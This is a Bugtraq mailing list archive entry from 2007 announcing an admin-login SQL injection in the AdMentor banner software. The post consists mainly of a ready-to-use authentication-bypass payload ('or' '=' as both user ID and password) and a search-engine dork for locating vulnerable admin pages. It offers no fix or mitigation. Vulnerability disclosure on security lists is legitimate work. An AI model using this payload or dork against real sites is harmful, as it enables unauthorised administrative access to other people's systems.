Bugtraq mailing list archives

AdMentor (banners) admin SQL injection

From: sn0oPy.team () gmail com
Date: 27 Jan 2007 13:36:01 -0000

* AdMentor (banners) admin SQL injection

* By : sn0oPy

* Risk : high

* Site : http://www.aspcode.net/products/admentor

* Dork : inurl:"admentor/admin"

* exploit :

         UserID = 'or' '='
            
         Password = 'or' '='
                 

* contact : sn0oPy.team () gmail com

* greetz : [subzero], Avg Team(http://forums.avenir-geopolitique.net).

references : http://forums.avenir-geopolitique.net/viewtopic.php?t=2606

Current thread:

AdMentor (banners) admin SQL injection sn0oPy . team (Jan 27)
- <Possible follow-ups>
- AdMentor (banners) admin SQL injection sn0oPy . team (Jan 29)